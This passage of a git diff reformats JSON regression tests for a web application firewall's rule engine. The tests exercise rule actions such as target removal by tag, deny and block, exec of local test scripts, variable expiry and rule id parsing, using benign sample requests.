\"id:1,phase:1,pass,t:none,ctl:ruleRemoveTargetById=2;REQUEST_HEADERS:referer\"", + "SecRule REQUEST_HEADERS:Referer \"@contains attack\" \"id:2,phase:1,deny,t:none,log\"" ] } ] diff --git a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json index fc696a5cb0..f55a7c7f9a 100644 --- a/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json +++ b/test/test-cases/regression/action-ctl_rule_remove_target_by_tag.json @@ -1,99 +1,131 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (1)", - "expected":{ - "http_code": 200 + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (1)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "rules":[ - "SecRuleEngine On", - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" + "expected": { + "http_code": 200 + }, + "rules": [ + "SecRuleEngine On", + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS \"@contains lhebs\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS',deny\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (2)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (2)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:pwd", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", - "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS:pwd\"", + "SecRule ARGS_NAMES \"@contains pwd\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing CtlRuleRemoteTargetByTag (3)", - "expected":{ - "debug_log": "Target value: .*Variable: ARGS_NAMES:whee" + "enabled": 1, + "version_min": 300000, + "title": "Testing CtlRuleRemoteTargetByTag (3)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "client":{ - "ip":"200.249.12.31", - "port":123 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", "Content-Type": "text/xml" }, - "uri":"/wp-login.php?whee=something&pwd=lhebs", - "method":"GET", - "body": [ ] + "uri": "/wp-login.php?whee=something&pwd=lhebs", + "method": "GET", + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "debug_log": "Target value: .*Variable: ARGS_NAMES:whee", + "http_code": 200 }, - "rules":[ - "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", - "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" + "rules": [ + "SecRule REQUEST_FILENAME \"@endsWith /wp-login.php\" \"id:9002100,phase:2,t:none,nolog,pass,ctl:ruleRemoveTargetByTag=CRS;ARGS\"", + "SecRule ARGS_NAMES \"@contains whee\" \"id:1,phase:3,t:none,nolog,pass,tag:'CRS2'\"" ] } ] diff --git a/test/test-cases/regression/action-disruptive.json b/test/test-cases/regression/action-disruptive.json index da39b1c3bc..d345223c3f 100644 --- a/test/test-cases/regression/action-disruptive.json +++ b/test/test-cases/regression/action-disruptive.json @@ -1,78 +1,234 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (1/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (1/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":403 + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'900001',phase:request,nolog,status:403,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (2/n)", - "expected":{ + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (2/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { "debug_log": "Running action deny", - "http_code":404 + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,t:none,block\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (3/n)", - "expected":{ - "http_code":404 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (3/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 404 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,block,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (4/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (4/n)", + "client": { + "ip": "", + "port": 0 }, - "rules":[ + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,nolog,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (5/n)", - "expected":{ - "http_code":200 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (5/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] }, - "rules":[ + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 200 + }, + "rules": [ "SecRuleEngine On", "SecDefaultAction \"phase:2,deny,status:404\"", "SecAction \"id:'1',phase:request,nolog,pass,t:none\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Disruptive actions (6/n)", - "expected":{ - "http_code":403 + "enabled": 1, + "version_min": 300000, + "title": "Testing Disruptive actions (6/n)", + "client": { + "ip": "", + "port": 0 + }, + "server": { + "ip": "", + "port": 0 + }, + "request": { + "headers": { + + }, + "uri": "", + "method": "", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] + }, + "expected": { + "http_code": 403 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"id:'1',phase:request,drop,nolog,t:none\"" ] diff --git a/test/test-cases/regression/action-exec.json b/test/test-cases/regression/action-exec.json index 80661114e0..5b5e6dcde3 100644 --- a/test/test-cases/regression/action-exec.json +++ b/test/test-cases/regression/action-exec.json @@ -1,148 +1,159 @@ [ { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (1/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (1/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Saving msg: This is a test, text\/html,application", - "error_log":"", - "parser_error":"exec: Expecting a Lua script: /bin/ech" + "expected": { + "debug_log": "Saving msg: This is a test, text/html,application", + "http_code": 200, + "parser_error": "exec: Expecting a Lua script: /bin/ech" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS \"@contains PHPSESSID\" \"id:1,t:lowercase,t:none,exec:/bin/echo\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (2/2)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (2/2)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/test.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/test.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/test.lua\"" ] }, { - "enabled":1, - "version_min":300000, - "version_max":0, - "resource":"lua", - "title":"Testing action :: exec (3/3)", - "client":{ - "ip":"200.249.12.31", - "port":2313 + "enabled": 1, + "version_min": 300000, + "version_max": 0, + "title": "Testing action :: exec (3/3)", + "resource": "lua", + "client": { + "ip": "200.249.12.31", + "port": 2313 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "User-Agent":"Mozilla\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\/20091102 Firefox\/3.5.5 (.NET CLR 3.5.30729)", - "Accept":"text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8", - "Accept-Language":"en-us,en;q=0.5", - "Accept-Encoding":"gzip,deflate", - "Accept-Charset":"ISO-8859-1,utf-8;q=0.7,*;q=0.7", - "Keep-Alive":"300", - "Connection":"keep-alive", - "Cookie":"PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", - "Pragma":"no-cache", - "Cache-Control":"no-cache" + "request": { + "headers": { + "User-Agent": "Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5 (.NET CLR 3.5.30729)", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "Accept-Language": "en-us,en;q=0.5", + "Accept-Encoding": "gzip,deflate", + "Accept-Charset": "ISO-8859-1,utf-8;q=0.7,*;q=0.7", + "Keep-Alive": "300", + "Connection": "keep-alive", + "Cookie": "PHPSESSID=rAAAAAAA2t5uvjq435r4q7ib3vtdjq120", + "Pragma": "no-cache", + "Cache-Control": "no-cache" }, - "uri":"\/test.pl?param1= test ¶m2=test2", - "method":"GET", - "http_version":1.1, - "body":"" + "uri": "/test.pl?param1= test ¶m2=test2", + "method": "GET", + "http_version": 1.1, + "body": [ + "" + ] }, - "response":{ - "headers":{ - "Content-Type":"text\/xml; charset=utf-8\n\r", - "Content-Length":"length\n\r" - } + "response": { + "headers": { + "Content-Type": "text/xml; charset=utf-8\n\r", + "Content-Length": "length\n\r" + }, + "body": [ + "" + ] }, - "expected":{ - "audit_log":"", - "debug_log":"Running script... test-cases/data/match.lua", - "error_log":"" + "expected": { + "debug_log": "Running script... test-cases/data/match.lua", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule REQUEST_HEADERS:Cookie \"@contains PHPSESSID\" \"id:1,exec:test-cases/data/match.lua\"" ] } ] - diff --git a/test/test-cases/regression/action-expirevar.json b/test/test-cases/regression/action-expirevar.json index 5c9d4ddfd4..3e2e9e6b72 100644 --- a/test/test-cases/regression/action-expirevar.json +++ b/test/test-cases/regression/action-expirevar.json @@ -1,29 +1,41 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (1/x) - ip, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 100" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (1/x) - ip, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 100", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5000,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5001',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=60,pass\"", @@ -31,30 +43,42 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (2/x) - ip, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is " - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (2/x) - ip, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is ", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecAction \"initcol:ip='127.0.0.1',id:5010,phase:1\"", "SecRule ARGS \"@rx value\" \"id:'5011',phase:2,setvar:ip.mycount1=100,expirevar:ip.mycount1=0,pass\"", @@ -62,30 +86,42 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (3/x) session, expire later", - "expected":{ - "debug_log": "Saving msg: mycount1 is 12" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (3/x) session, expire later", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" }, - "uri":"/?key=value", - "method":"GET" + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + + }, + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is 12", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=30\"", @@ -93,30 +129,42 @@ ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing expirevar action (4/x) session, expire immediately", - "expected":{ - "debug_log": "Saving msg: mycount1 is" - }, - "client":{ - "ip":"200.249.12.31", - "port":123 - }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*" + "enabled": 1, + "version_min": 300000, + "title": "Testing expirevar action (4/x) session, expire immediately", + "client": { + "ip": "200.249.12.31", + "port": 123 + }, + "server": { + "ip": "200.249.12.31", + "port": 80 + }, + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*" + }, + "uri": "/?key=value", + "method": "GET", + "body": [ + "" + ] + }, + "response": { + "headers": { + }, - "uri":"/?key=value", - "method":"GET" + "body": [ + "" + ] }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "expected": { + "debug_log": "Saving msg: mycount1 is", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx .\" \"id:5150,phase:2,pass,setsid:sess1234\"", "SecRule ARGS \"@rx value\" \"id:5151,phase:2,pass,setvar:session.mycount1=12,expirevar:session.mycount1=0\"", diff --git a/test/test-cases/regression/action-id.json b/test/test-cases/regression/action-id.json index 9f9453c7e9..316228995f 100644 --- a/test/test-cases/regression/action-id.json +++ b/test/test-cases/regression/action-id.json @@ -1,264 +1,270 @@ [ { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (1/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (1/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "The input \"111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666\" does not seems to be a valid rule id." }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:111111111111222222222222222222222222222333333333333333333333333333444444444444444444444444444444555555555555555555555555666666666666666666666666666666666666666666,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (2/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (2/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ + "expected": { + "http_code": 200, "parser_error": "File: action-id.json. Line: 2. Column: 56. Expecting an action, got: id:-1,phase:2,pass,t:trim\"" }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:-1,phase:2,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (3/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (3/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:1,phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (4/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (4/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 2015 20:02:41 GMT", + "Last-Modified": "Sun, 26 Oct 2014 22:33:37 GMT", + "Content-Type": "text/html" }, - "body":[ + "body": [ "no need." ] }, - "expected":{ - "debug_log": " t:trim: \"value2\"" + "expected": { + "debug_log": " t:trim: \"value2\"", + "http_code": 200 }, - "rules":[ + "rules": [ "SecRuleEngine On", "SecRule ARGS \"@rx (value1)\" \"id:'1',phase:3,pass,t:trim\"" ] }, { - "enabled":1, - "version_min":300000, - "title":"Testing Action :: id (5/6)", - "client":{ - "ip":"200.249.12.31", - "port":123 + "enabled": 1, + "version_min": 300000, + "title": "Testing Action :: id (5/6)", + "client": { + "ip": "200.249.12.31", + "port": 123 }, - "server":{ - "ip":"200.249.12.31", - "port":80 + "server": { + "ip": "200.249.12.31", + "port": 80 }, - "request":{ - "headers":{ - "Host":"localhost", - "User-Agent":"curl/7.38.0", - "Accept":"*/*", + "request": { + "headers": { + "Host": "localhost", + "User-Agent": "curl/7.38.0", + "Accept": "*/*", "Content-Length": "27", "Content-Type": "application/x-www-form-urlencoded" }, - "uri":"/", - "method":"POST", + "uri": "/", + "method": "POST", "body": [ "param1=value1¶m2=value2" ] }, - "response":{ - "headers":{ - "Date":"Mon, 13 Jul 2015 20:02:41 GMT", - "Last-Modified":"Sun, 26 Oct 2014 22:33:37 GMT", - "Content-Type":"text/html" + "response": { + "headers": { + "Date": "Mon, 13 Jul 